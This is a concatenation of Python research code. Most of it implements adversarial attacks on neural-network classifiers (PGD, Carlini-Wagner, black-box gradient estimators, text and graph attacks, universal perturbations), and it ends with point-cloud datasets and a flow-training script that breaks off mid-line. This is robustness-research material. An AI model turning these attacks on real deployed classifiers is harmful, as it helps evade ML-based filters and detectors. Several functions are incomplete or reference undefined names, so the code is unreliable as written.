loss1 = torch.clamp(real - other + confidence, min=0.) # equiv to max(..., 0.)
loss = torch.mean(scale_const * loss1)
return loss
def PGD_white_box_generator(args, train_loader, test_loader, model, G,\
nc=1,h=28,w=28):
epsilon = args.epsilon
opt = optim.Adam(G.parameters(),lr=1e-4)
if args.carlini_loss:
misclassify_loss_func = carlini_wagner_loss
else:
misclassify_loss_func = CE_loss_func
''' Training Phase '''
for epoch in range(0,args.attack_epochs):
train_itr = tqdm(enumerate(train_loader),\
total=len(train_loader.dataset)/args.batch_size)
correct = 0
# PGD_generate_multiple_samples(args,epoch,test_loader,model,G,nc,h,w)
PGD_test_model(args,epoch,test_loader,model,G,nc,h,w)
for batch_idx, (data, target) in train_itr:
x, target = data.to(args.device), target.to(args.device)
for t in range(args.PGD_steps):
if not args.vanilla_G:
delta, kl_div = G(x)
else:
delta = G(x)
delta = delta.view(delta.size(0), nc, h, w)
# Clipping is equivalent to projecting back onto the l_\infty ball
# This technique is known as projected gradient descent (PGD)
delta.data.clamp_(-epsilon, epsilon)
delta.data = torch.clamp(x.data + delta.data,-1.,1.) - x.data
pred = model(x.detach() + delta)
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
loss = misclassify_loss_func(args,pred,target) + kl_div.sum()
if args.comet:
args.experiment.log_metric("Whitebox CE loss",loss,step=t)
opt.zero_grad()
loss.backward()
for p in G.parameters():
p.grad.data.sign_()
opt.step()
correct += out.eq(target.unsqueeze(1).data).sum()
if args.comet:
args.experiment.log_metric("Whitebox CE loss",loss,step=epoch)
args.experiment.log_metric("Adv Accuracy",\
100.*correct/len(train_loader.dataset),step=epoch)
print('\nTrain: Epoch:{} Loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'\
.format(epoch,\
loss, correct, len(train_loader.dataset),
100. * correct / len(train_loader.dataset)))
return out, delta
def L2_white_box_generator(args, train_loader, test_loader, model, G,\
nc=1,h=28,w=28):
epsilon = args.epsilon
opt = optim.Adam(G.parameters())
mode = "Train"
if args.carlini_loss:
misclassify_loss_func = carlini_wagner_loss
else:
misclassify_loss_func = CE_loss_func
''' Training Phase '''
for epoch in range(0,args.attack_epochs):
train_itr = tqdm(enumerate(train_loader),\
total=len(train_loader.dataset)/args.batch_size)
correct = 0
if epoch == (args.attack_epochs - 1):
mode = "Test"
L2_test_model(args,epoch,test_loader,model,G,nc,h,w,mode=mode)
for batch_idx, (data, target) in train_itr:
x, target = data.to(args.device), target.to(args.device)
num_unperturbed = 10
iter_count = 0
loss_perturb = 20
loss_misclassify = 10
while loss_misclassify > 0 and loss_perturb > 0:
if not args.vanilla_G:
delta, kl_div = G(x)
kl_div = kl_div.sum() / len(x)
else:
delta = G(x)
delta = delta.view(delta.size(0), nc, h, w)
adv_inputs = x.detach() + delta
adv_inputs = torch.clamp(adv_inputs, -1.0, 1.0)
pred = model(adv_inputs)
out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
loss_misclassify = misclassify_loss_func(args,pred,target)
if args.inf_loss:
loss_perturb = Linf_dist(x,adv_inputs) / len(x)
else:
loss_perturb = L2_dist(x,adv_inputs) / len(x)
loss = loss_misclassify + args.LAMBDA * loss_perturb + kl_div
opt.zero_grad()
loss.backward()
opt.step()
iter_count = iter_count + 1
num_unperturbed = out.eq(target.unsqueeze(1).data).sum()
if iter_count > args.max_iter:
break
correct += out.eq(target.unsqueeze(1).data).sum()
if args.comet:
acc = 100.*correct.cpu().numpy()/len(train_loader.dataset)
args.experiment.log_metric("Whitebox Total loss",loss,step=epoch)
args.experiment.log_metric("Whitebox Perturb loss",loss_perturb,step=epoch)
args.experiment.log_metric("Whitebox Misclassification loss",\
loss_misclassify,step=epoch)
args.experiment.log_metric("Train Adv Accuracy",acc,step=epoch)
print('\nTrain: Epoch:{} Loss: {:.4f}, Misclassification Loss \
:{:.4f}, Perturbation Loss {:.4f} Accuracy: {}/{} ({:.0f}%)\n'\
.format(epoch,\
loss, loss_misclassify, loss_perturb, correct, len(train_loader.dataset),
100. * correct.cpu().numpy() / len(train_loader.dataset)))
return out, delta
def soft_reward(pred, targ):
"""
BlackBox adversarial soft reward. Highest reward when `pred` for `targ`
class is low. Use this reward to reinforce action gradients.
Computed as: 1 - (targ pred).
Args:
pred: model log prediction vector, to be normalized below
targ: true class integer, we want to decrease probability of this class
"""
# pred = F.softmax(pred, dim=1)
pred_prob = torch.exp(pred)
gather = pred[:,targ] # gather target predictions
ones = torch.ones_like(gather)
r = ones - gather
r = r.mean()
return r
def hard_reward(pred, targ):
"""
BlackBox adversarial 0/1 reward.
1 if predict something other than target, 0 if predict target. This reward
should make it much harder to optimize a black box attacker.
"""
pred = F.softmax(pred, dim=1)
out = pred.max(1, keepdim=True)[1] # get the index of the max log-prob
def CE_loss_func(args,pred, targ):
"""
Want to maximize CE, so return negative since optimizer -> gradient descent
Args:
pred: model prediction
targ: true class, we want to decrease probability of this class
"""
loss = -nn.CrossEntropyLoss(reduction="sum")(pred, targ)
loss = loss / len(targ)
return loss
def linf_constraint(grad):
"""
Constrain delta to l_infty ball
"""
return torch.sign(grad)
def reinforce(log_prob, f, **kwargs):
"""
Based on
https://github.com/pytorch/examples/blob/master/reinforcement_learning/reinforce.py
"""
policy_loss = (-log_prob) * f.detach()
return policy_loss
def reinforce_new(log_prob, f, **kwargs):
policy_loss = (-log_prob) * f.detach()
d_loss = torch.autograd.grad([policy_loss.mean()], [log_prob],
create_graph=True,retain_graph=True)[0]
return d_loss.detach()
def lax_black(log_prob, f, f_cv, param, cv, cv_opt):
"""
Returns policy loss equivalent to:
(f(x) - c(x))*grad(log(policy)) + grad(c(x))
The l_infty constraint should appear elsewhere
Args:
f: unknown function
f_cv: control variate
Checkout https://github.com/duvenaud/relax/blob/master/pytorch_toy.py
"""
log_prob = (-1)*log_prob
# Gradients of log_prob wrt to Gaussian params
d_params_probs = torch.autograd.grad([log_prob.sum()],param,
create_graph=True, retain_graph=True)
# Gradients of cont var wrt to Gaussian params
d_params_cont = torch.autograd.grad([f_cv], param,
create_graph=True, retain_graph=True)
# Difference between f and control variate
ac = f - f_cv
# Scale gradient, negative cv gradient since reward
d_log_prob = []
for p, c in zip(d_params_probs, d_params_cont):
d_log_prob.append(ac*p - c)
# Backprop param gradients
for p, g in zip(param, d_log_prob):
p.backward(g.detach(), retain_graph=True)
# Optimize control variate to minimize variance
var = sum([v**2 for v in d_log_prob])
d_var = torch.autograd.grad([var.mean()], cv.parameters(),
create_graph=True, retain_graph=True)
# Set gradients to control variate params
for p, g in zip(cv.parameters(), d_var):
p.grad = g
cv_opt.step()
return None
```
#### File: BlackMagicDesign/BMD_graph/utils.py
```python
import numpy as np
import torch
import torchvision
from torch import nn, optim
import torchvision.transforms as transforms
from torchvision import datasets
from torchvision.models import resnet50
import torchvision.utils as vutils
from torchvision.utils import save_image
import torch.nn.functional as F
import matplotlib.pyplot as plt
import torchvision.models as models
from dgl import DGLGraph
from dgl.data import register_data_args, load_data
from random import randint
from PIL import Image
import os
from attack_models import GCN
import ipdb
def reduce_sum(x, keepdim=True):
for a in reversed(range(1, x.dim())):
x = x.sum(a, keepdim=keepdim)
return x.squeeze().sum()
def L2_dist(x, y):
return reduce_sum((x - y)**2)
def to_cuda(model):
cuda_stat = torch.cuda.is_available()
if cuda_stat:
model = torch.nn.DataParallel(model,\
device_ids=range(torch.cuda.device_count())).cuda()
return model
def tensor_to_cuda(x):
cuda_stat = torch.cuda.is_available()
if cuda_stat:
x = x.cuda()
return x
def sample_mask(idx, l):
"""Create mask."""
mask = np.zeros(l)
mask[idx] = 1
return mask
def calc_class_margin(probs,correct_indices):
correct_probs = probs[correct_indices].squeeze()
vals,inds = torch.topk(correct_probs,2,dim=1)
margin = vals[:,0] - vals[:,1]
top_margin, top_inds = torch.topk(margin,10)
bot_margin, bot_inds = torch.topk(-1*margin,10)
top_nodes = correct_indices[top_inds]
bot_nodes = correct_indices[bot_inds]
return top_nodes, bot_nodes
def evaluate(model, features, labels, mask):
model.eval()
with torch.no_grad():
logits = model(features)
probs = F.softmax(logits,dim=1)
logits = logits[mask]
labels = labels[mask]
_, indices = torch.max(logits, dim=1)
results = (indices == labels.cuda())
correct = torch.sum(results)
correct_indices = (results != 0).nonzero()
top_nodes,bot_nodes = calc_class_margin(probs,correct_indices)
return correct.item() * 1.0 / len(labels), correct_indices, top_nodes, bot_nodes
def get_data(args):
"""
Data loader. For now, just a test sample
"""
args.syn_train_ratio = 0.1
args.syn_val_ratio = 0.1
args.syn_test_ratio = 0.8
data = load_data(args)
features = torch.FloatTensor(data.features)
labels = torch.LongTensor(data.labels)
train_mask = torch.ByteTensor(data.train_mask)
val_mask = torch.ByteTensor(data.val_mask)
test_mask = torch.ByteTensor(data.test_mask)
args.in_feats = features.shape[1]
args.classes = data.num_labels
args.n_edges = data.graph.number_of_edges()
print("""----Data statistics------'
#Edges %d
#Classes %d
#Train samples %d
#Val samples %d
#Test samples %d""" %
(args.n_edges, args.classes,
train_mask.sum().item(),
val_mask.sum().item(),
test_mask.sum().item()))
train_mask = train_mask.cuda()
val_mask = val_mask.cuda()
test_mask = test_mask.cuda()
stop_number = int(np.round(len(labels)*0.1))
attacker_mask = torch.ByteTensor(sample_mask(range(stop_number), labels.shape[0]))
target_mask = torch.ByteTensor(sample_mask(range(stop_number), labels.shape[0]))
return features, labels, train_mask, val_mask, test_mask, data
def load_unk_model(args,data,features,labels):
"""
Load an unknown model. Used for convenience to easily swap unk model
"""
g = data.graph
# add self loop
if args.self_loop:
g.remove_edges_from(g.selfloop_edges())
g.add_edges_from(zip(g.nodes(), g.nodes()))
g = DGLGraph(g)
n_edges = g.number_of_edges()
# normalization
degs = g.in_degrees().float()
norm = torch.pow(degs, -0.5)
norm[torch.isinf(norm)] = 0
norm = norm.cuda()
g.ndata['norm'] = norm.unsqueeze(1)
# create GCN model
model = GCN(g,
args.in_feats,
args.n_hidden,
args.classes,
args.n_layers,
F.relu,
args.dropout).cuda()
load_file = 'saved_models/'+args.dataset+'_graph_classifier.pt'
# model.load_state_dict(torch.load('saved_models/graph_classifier.pt'))
model.load_state_dict(torch.load(load_file))
model.eval()
return model
def train_classifier(args, model, device,features, labels, train_mask, val_mask, test_mask, data):
model.train()
loss_fcn = torch.nn.CrossEntropyLoss()
# use optimizer
optimizer = torch.optim.Adam(model.parameters(),
lr=args.lr,
weight_decay=args.weight_decay)
# initialize graph
dur = []
for epoch in range(args.n_epochs):
model.train()
if epoch >= 3:
t0 = time.time()
# forward
logits = model(features)
loss = loss_fcn(logits[train_mask], labels[train_mask])
optimizer.zero_grad()
loss.backward()
optimizer.step()
if epoch >= 3:
dur.append(time.time() - t0)
acc = evaluate(model, features, labels, val_mask)
print("Epoch {:05d} | Time(s) {:.4f} | Loss {:.4f} | Accuracy {:.4f} | "
"ETputs(KTEPS) {:.2f}". format(epoch, np.mean(dur), loss.item(),
acc, n_edges / np.mean(dur) / 1000))
print()
acc = evaluate(model, features, labels, test_mask)
print("Test Accuracy {:.4f}".format(acc))
torch.save(model.state_dict(),'saved_models/graph_classifier.pt')
def freeze_model(model):
model.eval()
for params in model.parameters():
params.requires_grad = False
return model
```
#### File: BlackMagicDesign/BMD_text/main.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json, os, sys
import datetime
import argparse
# Comet will timeout if no internet
try:
from comet_ml import Experiment
except Exception as e:
from comet_ml import OfflineExperiment
from types import MethodType
import ipdb
from PIL import Image
import matplotlib.pyplot as plt
import torch
from torch import nn, optim
from torchvision import transforms
import torch.nn.functional as F
from torch import optim
from torch.autograd import Variable
import utils, models, text_attacks
import flows
from torch.nn.utils import clip_grad_norm_
from torchtext import data
from torchtext import datasets
from torchtext.vocab import Vectors, GloVe, CharNGram, FastText
from torch.nn.modules.loss import NLLLoss,MultiLabelSoftMarginLoss,MultiLabelMarginLoss,BCELoss
from attack_models import Seq2Seq, JSDistance, Seq2SeqCAE, Baseline_LSTM
import dataHelper
def main(args):
# Load data
if args.single_data:
data,target = utils.get_single_data(args)
else:
train_loader,test_loader,dev_loader = utils.get_data(args, args.prepared_data)
# The unknown model to attack, specified in args.model
unk_model = utils.load_unk_model(args,train_loader,test_loader)
# Try Whitebox Untargeted first
if args.debug:
ipdb.set_trace()
# TODO: do we need this alphabet?
ntokens = args.vocab_size
# ntokens = len(args.alphabet)
# inv_alphabet = {v: k for k, v in args.alphabet.items()}
# args.inv_alph = inv_alphabet
# Load model which will produce the attack
if args.convolution_enc:
G = Seq2SeqCAE(emsize=args.emsize,
glove_weights=args.embeddings,
train_emb=args.train_emb,
nhidden=args.nhidden,
ntokens=ntokens,
nlayers=args.nlayers,
noise_radius=args.noise_radius,
hidden_init=args.hidden_init,
dropout=args.dropout,
conv_layer=args.arch_conv_filters,
conv_windows=args.arch_conv_windows,
conv_strides=args.arch_conv_strides)
else:
G = Seq2Seq(emsize=args.emsize,
glove_weights=args.embeddings,
train_emb=args.train_emb,
nhidden=args.nhidden,
ntokens=ntokens,
nlayers=args.nlayers,
noise_radius=args.noise_radius,
hidden_init=args.hidden_init,
dropout=args.dropout,
deterministic=args.deterministic_G)
# Efficient compute
G = G.to(args.device)
if not args.no_parallel:
G = nn.DataParallel(G)
# Load saved
if args.load_model:
G = torch.load(args.adv_model_path)
print("Loaded saved model from: {}".format(args.adv_model_path))
# Maybe Add A Flow
norm_flow = None
if args.use_flow:
# norm_flow = flows.NormalizingFlow(30, args.latent).to(args.device)
norm_flow = flows.Planar
# Train white box
if args.white:
# Choose Attack Function
if args.no_pgd_optim:
white_attack_func = text_attacks.L2_white_box_generator
else:
white_attack_func = text_attacks.PGD_white_box_generator
# Test resampling capability
if args.resample_test:
# if not args.load_model:
# msg = "You need to pass --load_model to"
# msg += " load a model in order to resample"
# sys.exit(msg)
print("Starting resampling")
utils.evaluate_neighbours(test_loader, unk_model, G, args, 0)
sys.exit(0)
# Train on a single data point or entire dataset
elif args.single_data:
# pred, delta = attacks.single_white_box_generator(args, data, target, unk_model, G)
# pred, delta = attacks.white_box_untargeted(args, data, target, unk_model)
text_attacks.whitebox_pgd(args, data, target, unk_model)
else:
white_attack_func(args, train_loader,\
test_loader, dev_loader, unk_model, G)
# # Blackbox Attack model
# model = models.GaussianPolicy(args.input_size, 400,
# args.latent_size,decode=False).to(args.device)
# # Control Variate
# cv = models.FC(args.input_size, args.classes).to(args.device)
# # Launch training
# if args.single_data:
# pred, delta = text_attacks.single_blackbox_attack(args, 'lax', data, target, unk_model, model, cv)
# pred, delta = text_attacks.single_blackbox_attack(args, 'reinforce', data, target, unk_model, model, cv)
if __name__ == '__main__':
"""
Process command-line arguments, then call main()
"""
parser = argparse.ArgumentParser(description='BlackBox')
# Hparams
padd = parser.add_argument
padd('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
padd('--latent_dim', type=int, default=20, metavar='N',
help='Latent dim for VAE')
padd('--lr', type=float, default=0.01, metavar='LR',
help='learning rate (default: 0.01)')
padd('--momentum', type=float, default=0.5, metavar='M',
help='SGD momentum (default: 0.5)')
padd('--latent_size', type=int, default=50, metavar='N',
help='Size of latent distribution (default: 50)')
padd('--estimator', default='reinforce', const='reinforce',
nargs='?', choices=['reinforce', 'lax'],
help='Grad estimator for noise (default: %(default)s)')
padd('--reward', default='soft', const='soft',
nargs='?', choices=['soft', 'hard'],
help='Reward for grad estimator (default: %(default)s)')
padd('--flow_type', default='planar', const='soft',
nargs='?', choices=['planar', 'radial'],
help='Type of Normalizing Flow (default: %(default)s)')
# Training
padd('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 10)')
padd('--PGD_steps', type=int, default=40, metavar='N',
help='max gradient steps (default: 30)')
padd('--max_iter', type=int, default=20, metavar='N',
help='max gradient steps (default: 30)')
padd('--max_batches', type=int, default=None, metavar='N',
help='max number of batches per epoch, used for debugging (default: None)')
padd('--epsilon', type=float, default=0.5, metavar='M',
help='Epsilon for Delta (default: 0.1)')
padd('--LAMBDA', type=float, default=100, metavar='M',
help='Lambda for L2 lagrange penalty (default: 0.1)')
padd('--nn_temp', type=float, default=1.0, metavar='M',
help='Starting diff. nearest neighbour temp (default: 1.0)')
padd('--temp_decay_rate', type=float, default=0.9, metavar='M',
help='Nearest neighbour temp decay rate (default: 0.9)')
padd('--temp_decay_schedule', type=float, default=100, metavar='M',
help='How many batches before decay (default: 100)')
padd('--bb_steps', type=int, default=2000, metavar='N',
help='Max black box steps per sample(default: 1000)')
padd('--attack_epochs', type=int, default=10, metavar='N',
help='Max numbe of epochs to train G')
padd('--num_flows', type=int, default=30, metavar='N',
help='Number of Flows')
padd('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
padd('--batch_size', type=int, default=256, metavar='S',
help='Batch size')
padd('--embedding_dim', type=int, default=300,
help='embedding_dim')
padd('--embedding_type', type=str, default="non-static",
help='embedding_type')
padd('--test_batch_size', type=int, default=128, metavar='N',
help='Test Batch size. 256 requires 12GB GPU memory')
padd('--test', default=False, action='store_true',
help='just test model and print accuracy')
padd('--deterministic_G', default=False, action='store_true',
help='Auto-encoder, no VAE')
padd('--resample_test', default=False, action='store_true',
help='Load model and test resampling capability')
padd('--resample_iterations', type=int, default=100, metavar='N',
help='How many times to resample (default: 100)')
padd('--clip_grad', default=True, action='store_true',
help='Clip grad norm')
padd('--train_vae', default=False, action='store_true',
help='Train VAE')
padd('--train_ae', default=False, action='store_true',
help='Train AE')
padd('--white', default=False, action='store_true',
help='White Box test')
padd('--use_flow', default=False, action='store_true',
help='Add A NF to Generator')
padd('--carlini_loss', default=False, action='store_true',
help='Use CW loss function')
padd('--no_pgd_optim', default=False, action='store_true',
help='Use Lagrangian objective instead of PGD')
padd('--vanilla_G', default=False, action='store_true',
help='Vanilla G White Box')
padd('--single_data', default=False, action='store_true',
help='Test on a single data')
padd('--prepared_data',default='dataloader/prepared_data.pickle',
help='Test on a single data')
# Imported Model Params
padd('--emsize', type=int, default=300,
help='size of word embeddings')
padd('--nhidden', type=int, default=300,
help='number of hidden units per layer in LSTM')
padd('--nlayers', type=int, default=2,
help='number of layers')
padd('--noise_radius', type=float, default=0.2,
help='stdev of noise for autoencoder (regularizer)')
padd('--noise_anneal', type=float, default=0.995,
help='anneal noise_radius exponentially by this every 100 iterations')
padd('--hidden_init', action='store_true',
help="initialize decoder hidden state with encoder's")
padd('--arch_i', type=str, default='300-300',
help='inverter architecture (MLP)')
padd('--arch_g', type=str, default='300-300',
help='generator architecture (MLP)')
padd('--arch_d', type=str, default='300-300',
help='critic/discriminator architecture (MLP)')
padd('--arch_conv_filters', type=str, default='500-700-1000',
help='encoder filter sizes for different convolutional layers')
padd('--arch_conv_strides', type=str, default='1-2-2',
help='encoder strides for different convolutional layers')
padd('--arch_conv_windows', type=str, default='3-3-3',
help='encoder window sizes for different convolutional layers')
padd('--z_size', type=int, default=100,
help='dimension of random noise z to feed into generator')
padd('--temp', type=float, default=1,
help='softmax temperature (lower --> more discrete)')
padd('--enc_grad_norm', type=bool, default=True,
help='norm code gradient from critic->encoder')
padd('--train_emb', type=bool, default=True,
help='Train Glove Embeddings')
padd('--gan_toenc', type=float, default=-0.01,
help='weight factor passing gradient from gan to encoder')
padd('--dropout', type=float, default=0.0,
help='dropout applied to layers (0 = no dropout)')
padd('--useJS', type=bool, default=True,
help='use Jenson Shannon distance')
padd('--perturb_z', type=bool, default=True,
help='perturb noise space z instead of hidden c')
padd('--max_seq_len', type=int, default=200,
help='max_seq_len')
padd('--gamma', type=float, default=0.95,
help='Discount Factor')
padd('--model', type=str, default="lstm_arch",
help='classification model name')
padd('--distance_func', type=str, default="cosine",
help='NN distance function')
padd('--hidden_dim', type=int, default=128,
help='hidden_dim')
padd('--burn_in', type=int, default=500,
help='Train VAE burnin')
padd('--beta', type=float, default=0.,
help='Entropy reg')
padd('--embedding_training', type=bool, default=False,
help='embedding_training')
padd('--convolution_enc', action='store_true', default=False,
help='use convolutions in encoder')
padd('--seqgan_reward', action='store_true', default=False,
help='use seq gan reward')
padd('--train_classifier', action='store_true', default=False,
help='Train Classifier from scratch')
padd('--diff_nn', action='store_true', default=False,
help='Backprop through Nearest Neighbors')
# Bells
padd('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
padd('--no_parallel', action='store_true', default=False,
help="Don't use multiple GPUs")
padd('--save_adv_samples', action='store_true', default=False,
help='Write adversarial samples to disk')
padd('--nearest_neigh_all', action='store_true', default=False,
help='Evaluate near. neig. for whole evaluation set')
padd("--comet", action="store_true", default=False,
help='Use comet for logging')
padd("--offline_comet", action="store_true", default=False,
help='Use comet offline. To upload, after training run: comet-upload file.zip')
padd("--comet_username", type=str, default="joeybose",
help='Username for comet logging')
padd("--comet_apikey", type=str,\
default="<KEY>",help='Api for comet logging')
padd('--debug', default=False, action='store_true',
help='Debug')
padd('--debug_neighbour', default=False, action='store_true',
help='Debug nearest neighbour training')
padd('--load_model', default=False, action='store_true',
help='Whether to load a checkpointed model')
padd('--save_model', default=False, action='store_true',
help='Whether to checkpointed model')
padd('--model_path', type=str, default="saved_models/lstm_torchtext2.pt",\
help='where to save/load target model')
padd('--adv_model_path', type=str, default="saved_models/adv_model.pt",\
help='where to save/load adversarial')
padd('--no_load_embedding', action='store_false', default=True,
help='load Glove embeddings')
padd('--namestr', type=str, default='BMD Text', \
help='additional info in output filename to describe experiments')
padd('--dataset', type=str, default="imdb",help='dataset')
padd('--clip', type=float, default=1, help='gradient clipping, max norm')
padd('--use_glove', type=str, default="true",
help='gpu number')
args = parser.parse_args()
args.classes = 2
args.sample_file = "temp/adv_samples.txt"
use_cuda = not args.no_cuda and torch.cuda.is_available()
torch.manual_seed(args.seed)
# Check if settings file
if os.path.isfile("settings.json"):
with open('settings.json') as f:
data = json.load(f)
args.comet_apikey = data["apikey"]
args.comet_username = data["username"]
# Prep file to save adversarial samples
if args.save_adv_samples:
now = datetime.datetime.now()
if os.path.exists(args.sample_file):
os.remove(args.sample_file)
with open(args.sample_file, 'w') as f:
f.write("Adversarial samples starting:\n{}\n".format(now))
# No set_trace ;)
if args.debug is False:
ipdb.set_trace = lambda: None
# Comet logging
args.device = torch.device("cuda" if use_cuda else "cpu")
if args.comet and not args.offline_comet:
experiment = Experiment(api_key=args.comet_apikey,
project_name="black-magic-design",
workspace=args.comet_username)
elif args.offline_comet:
offline_path = "temp/offline_comet"
if not os.path.exists(offline_path):
os.makedirs(offline_path)
from comet_ml import OfflineExperiment
experiment = OfflineExperiment(
project_name="black-magic-design",
workspace=args.comet_username,
offline_directory=offline_path)
# To upload offline comet, run: comet-upload file.zip
if args.comet or args.offline_comet:
experiment.set_name(args.namestr)
def log_text(self, msg):
# Change line breaks for html breaks
msg = msg.replace('\n','<br>')
self.log_html("<p>{}</p>".format(msg))
experiment.log_text = MethodType(log_text, experiment)
args.experiment = experiment
main(args)
```
#### File: BlackMagicDesign/NAG/generate_uap.py
```python
import scipy
from model import *
from trainer import *
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from torchvision import models
import scipy
def load_checkpoint():
ckpt_dir = 'home/vkv/NAG/ckpt/'
print("[*] Loading model from {}".format(ckpt_dir))
filename = 'NAG' + '_ckpt.pth.tar'
ckpt_path = os.path.join(ckpt_dir, filename)
ckpt = torch.load(ckpt_path)
# load variables from checkpoint
model.load_state_dict(ckpt['state_dict'])
print("[*] Loaded {} checkpoint @ epoch {} with best valid acc of {:.3f}".format(
filename, ckpt['epoch'], ckpt['best_valid_acc']))
model = Generator().cuda()
net = choose_net('resnet50')
net = net.cuda()
load_checkpoint()
n=20
for i in range(n):
z = make_z((model.batch_size, model.z_dim ), minval=-1., maxval=1.)
z_ref = make_z((model.batch_size, model.z_dim ), minval=-1., maxval=1.)
pert = model(z_ref, z)
pert = pert.cpu().numpy()
pert = np.transpose(pert, (0,2,3,1))
np.save('perturbation' + str(i) + '.npy', pert[0])
scipy.misc.imsave('perturbation' + str(i) + '.png', pert[0])
print("{} {}".format(n, "perturbations saved"))
``` |
{
"source": "joeybose/Equivariant-Discrete-Flows",
"score": 3
} |
#### File: Equivariant-Discrete-Flows/data/point_cloud.py
```python
import os
import h5py
import numpy as np
import torch
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader
import torchvision.datasets as datasets
import torchvision.transforms as transforms
class SpatialMNIST(Dataset):
def __init__(self, data_dir, train):
super(SpatialMNIST, self).__init__()
self.data = datasets.MNIST(data_dir, train=train, download=True, transform=transforms.ToTensor())
self.grid = np.stack(np.meshgrid(range(28), range(27,-1,-1)), axis=-1).reshape([-1,2])
def __getitem__(self, idx):
img, _ = self.data[idx]
img = img.numpy().reshape([-1])
p = img / img.sum()
replace = True if (sum(p > 0) < 50) else False
ind = np.random.choice(784, 50, p=p, replace=replace)
x = self.grid[ind].copy().astype(np.float32)
x += np.random.uniform(0., 1., (50, 2))
# normalize
x /= 28. # [0, 1]
return x
def __len__(self):
return len(self.data)
class ModelNet(Dataset):
NUM_POINTS = 10000
label_dict = {'airplane': 0,
'bathtub': 1,
'bed': 2,
'bench': 3,
'bookshelf': 4,
'bottle': 5,
'bowl': 6,
'car': 7,
'chair': 8,
'cone': 9,
'cup': 10,
'curtain': 11,
'desk': 12,
'door': 13,
'dresser': 14,
'flower_pot': 15,
'glass_box': 16,
'guitar': 17,
'keyboard': 18,
'lamp': 19,
'laptop': 20,
'mantel': 21,
'monitor': 22,
'night_stand': 23,
'person': 24,
'piano': 25,
'plant': 26,
'radio': 27,
'range_hood': 28,
'sink': 29,
'sofa': 30,
'stairs': 31,
'stool': 32,
'table': 33,
'tent': 34,
'toilet': 35,
'tv_stand': 36,
'vase': 37,
'wardrobe': 38,
'xbox': 39,
}
def __init__(self, data_dir, category, set_size, train):
super(ModelNet, self).__init__()
with h5py.File(data_dir, 'r') as f:
train_cloud = np.array(f['tr_cloud'])
train_labels = np.array(f['tr_labels'])
test_cloud = np.array(f['test_cloud'])
test_labels = np.array(f['test_labels'])
if train:
data = train_cloud
label = train_labels
else:
data = test_cloud
label = test_labels
if category != 'all':
assert category in ModelNet.label_dict
inds = np.where(label == ModelNet.label_dict[category])[0]
data = data[inds]
label = label[inds]
self.data = data
self.set_size = set_size
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
x = self.data[idx]
# subsample
sel = np.random.choice(x.shape[0], self.set_size, replace=False)
x = x[sel]
# preprocess
x += np.random.randn(*x.shape) * 0.001
x_max = np.max(x)
x_min = np.min(x)
x = (x - x_min) / (x_max - x_min)
x -= np.mean(x, axis=0)
return x
# def get_loader(args):
# if args.data == 'spatial_mnist':
# trainset = SpatialMNIST(args.data_dir, True)
# testset = SpatialMNIST(args.data_dir, False)
# elif args.data == 'modelnet':
# trainset = ModelNet(args.data_dir, args.category, args.set_size, True)
# testset = ModelNet(args.data_dir, args.category, args.set_size, False)
# else:
# raise Exception()
# trainloader = DataLoader(trainset, batch_size=args.batch_size, shuffle=True, num_workers=2)
# testloader = DataLoader(testset, batch_size=args.batch_size, shuffle=False, num_workers=2)
# return trainloader, testloader
```
#### File: joeybose/Equivariant-Discrete-Flows/energy.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch import optim
from torch.utils.data import DataLoader, TensorDataset
import sklearn.datasets as datasets
import math
import os
import time
import argparse
import pprint
from functools import partial
import ipdb
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib import cm
from tqdm import tqdm
# from utils import utils
# from utils.utils import seed_everything, str2bool, visualize_transform
from utils.utils import *
from data import create_dataset
from data.toy_data import sample_2d_data
from flows import create_flow
from e2cnn import gspaces
from e2cnn import nn as enn
def count_parameters(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
def test(args, epoch, flow, whole_data, test_data_iter, prior):
flow.update_lipschitz(200)
holdout_nll = 0
with torch.no_grad():
flow.eval()
for it, batch_idxs in enumerate(test_data_iter):
if it > 100:
break
x = torch.Tensor(whole_data[batch_idxs]).cuda()
test_loss, test_logpz, test_delta_logp = flow.log_prob(inputs=x, prior=prior)
# z, delta_logp = flow(x, inverse=True)
# nll = (prior.energy(z).view(-1) + delta_logp.view(-1)).mean()
print("\r{}".format(it), test_loss.item(), end="")
holdout_nll += test_loss.item()
holdout_nll = holdout_nll / (it + 1)
print(
'[TEST] Iter {:04d} | Test NLL {:.6f} '.format(
epoch, holdout_nll
)
)
flow.train()
def train_flow(args, flow, optimizer):
time_meter = RunningAverageMeter(0.93)
loss_meter = RunningAverageMeter(0.93)
logpz_meter = RunningAverageMeter(0.93)
delta_logp_meter = RunningAverageMeter(0.93)
end = time.time()
flow.train()
data_smaller, whole_data, train_data_iter, test_data_iter, prior = create_dataset(args, args.dataset)
# if args.use_whole_data:
# data = torch.tensor(whole_data, dtype=torch.float32, device=args.dev)
# else:
# data = torch.tensor(data_smaller, dtype=torch.float32, device=args.dev)
for i in range(args.num_iters):
for it, idx in enumerate(train_data_iter):
data = torch.tensor(whole_data[idx], dtype=torch.float32,
device=args.dev)
optimizer.zero_grad()
beta = min(1, itr / args.annealing_iters) if args.annealing_iters > 0 else 1.
loss, logpz, delta_logp = flow.log_prob(inputs=data, prior=prior)
try:
if len(logpz) > 0:
logpz = torch.mean(logpz)
delta_logp = torch.mean(delta_logp)
except:
pass
# loss = -flow.log_prob(inputs=data).mean()
loss_meter.update(loss.item())
logpz_meter.update(logpz.item())
delta_logp_meter.update(delta_logp.item())
loss.backward()
# grad_norm = torch.nn.utils.clip_grad.clip_grad_norm_(flow.parameters(), 1.)
optimizer.step()
if 'resflow' in args.model_type:
flow.beta = beta
flow.update_lipschitz(args.n_lipschitz_iters)
if args.learn_p and itr > args.annealing_iters: flow.compute_p_grads()
time_meter.update(time.time() - end)
print(
